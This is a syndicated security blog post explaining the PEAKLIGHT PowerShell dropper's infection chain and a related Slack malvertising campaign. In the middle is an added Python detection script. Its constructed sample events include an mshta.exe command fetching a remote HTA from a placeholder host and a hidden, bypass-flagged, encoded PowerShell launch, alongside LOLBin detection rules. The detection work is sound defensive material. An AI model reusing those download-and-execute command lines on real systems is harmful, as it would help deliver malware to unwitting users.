Cybersecurity researchers have recently discovered a previously unseen dropper. Dubbed PEAKLIGHT, it is used to launch malware capable of infecting Windows systems. Reports claim that such infections lead to the spread of information stealers and loaders on Windows devices. In this article, we cover what the dropper is and how it functions.
As per recent media reports, the PEAKLIGHT dropper is an obfuscated PowerShell-based downloader. The dropper itself is part of a multi-stage execution chain that checks for the presence of ZIP archives.
During this stage, the downloader looks for such archives in hard-coded file paths. If no such archive exists, the downloader initiates contact with a CDN server.
This contact is used to download a remotely hosted file and save it to disk. So far, PEAKLIGHT has been observed downloading varying payloads that include:
During such downloads different obfuscation and evasion methods were used. Two common examples of such methods include proxy execution and CDN abuse. It’s worth mentioning here that pirated movies have been targeted by malware earlier in June as well.
Those keen on ensuring that their security protocols are effective should know that the PEAKLIGHT dropper's attack technique has been used for distributing malware strains that include Lumma Stealer, Hijack Loader, and CryptBot. In addition, all of these strains are advertised under the malware-as-a-service (MaaS) model.
As far as the attack chain is concerned, the dropper's activity begins with a Windows shortcut (LNK) file. This file is downloaded using a drive-by technique observed when users search for movies online. These files are distributed in ZIP archives disguised as pirated movies.
After a successful download, the LNK files contact a content delivery network (CDN) from which the JavaScript dropper is retrieved. The dropper then executes the PEAKLIGHT downloader script on the host, allowing it to reach out to a command-and-control (C2) server and fetch additional payloads.
Mandiant, a cybersecurity firm owned by Google, has discovered different variations of the LNK files. It’s worth mentioning that some of these files leverage asterisks to launch the legitimate mshta.exe. Doing so allows them to run malicious code retrieved from the remote server in a discreet manner.
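To show the defender's view of the chain just described (a LOLBin such as mshta.exe reached through an asterisk-laden path, which then hands off to a hidden, encoded PowerShell downloader), here is an added example that is not from the report or from TuxCare: three simple rules applied to constructed process-creation events. The event field names, file paths and URL are assumptions, not values from the campaign.

```python
import ntpath
import re

# Constructed sample process-creation events (hypothetical; not from the report).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\Syst*\msh*.exe" https://cdn.example.invalid/stage.hta'},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -EncodedCommand BASE64PLACEHOLDER"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r'"C:\Windows\System32\notepad.exe" notes.txt'},
]

# Living-off-the-land binaries worth watching when launched via a wildcard path.
LOLBINS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}

def basename(path):
    return ntpath.basename(path).lower()

def wildcard_lolbin(event):
    """First command-line token contains an asterisk while the resolved image is a LOLBin."""
    m = re.match(r'\s*"?([^"\s]+)', event["cmdline"])
    return bool(m and "*" in m.group(1) and basename(event["image"]) in LOLBINS)

def mshta_spawned_powershell(event):
    """mshta.exe handing off to PowerShell, as the JavaScript stage does for the downloader."""
    return basename(event["parent"]) == "mshta.exe" and basename(event["image"]) == "powershell.exe"

def hidden_encoded_powershell(event):
    """PowerShell started with a hidden window and an encoded command (obfuscated downloader)."""
    if basename(event["image"]) != "powershell.exe":
        return False
    c = event["cmdline"].lower()
    hidden = re.search(r"-w(?:indowstyle)?\s+hidden", c) is not None
    encoded = re.search(r"-e(?:nc|ncodedcommand)?\s+\S+", c) is not None
    return hidden and encoded

RULES = [wildcard_lolbin, mshta_spawned_powershell, hidden_encoded_powershell]

def analyze(events):
    """Return (event index, rule name) for every rule that fires."""
    return [(i, r.__name__) for i, e in enumerate(events) for r in RULES if r(e)]

if __name__ == "__main__":
    for idx, rule in analyze(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

Correlating the first two hits on one host (wildcard LOLBin launch followed by the PowerShell child) is what separates this chain from a benign script.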
Lastly, the disclosure of these tactics comes alongside a malvertising campaign detailed by Malwarebytes. That campaign uses fraudulent Google Search ads for Slack to direct targets to bogus websites hosting malicious installers that lead to the deployment of remote access trojans (RATs).
The PEAKLIGHT dropper represents a sophisticated new threat targeting Windows users, employing obfuscation, CDN abuse, and malvertising campaigns. By exploiting ZIP archives and fake ads, it delivers malware like Lumma Stealer and CryptBot, highlighting the need for robust cybersecurity practices to mitigate such evolving attack vectors.
The sources for this piece include articles in The Hacker News and Cyware.
The post PEAKLIGHT Dropper: Hackers Target Windows With Downloads appeared first on TuxCare.
*** This is a Security Bloggers Network syndicated blog from TuxCare authored by Wajahat Raja. Read the original post at: https://tuxcare.com/blog/peaklight-dropper-hackers-target-windows-with-downloads/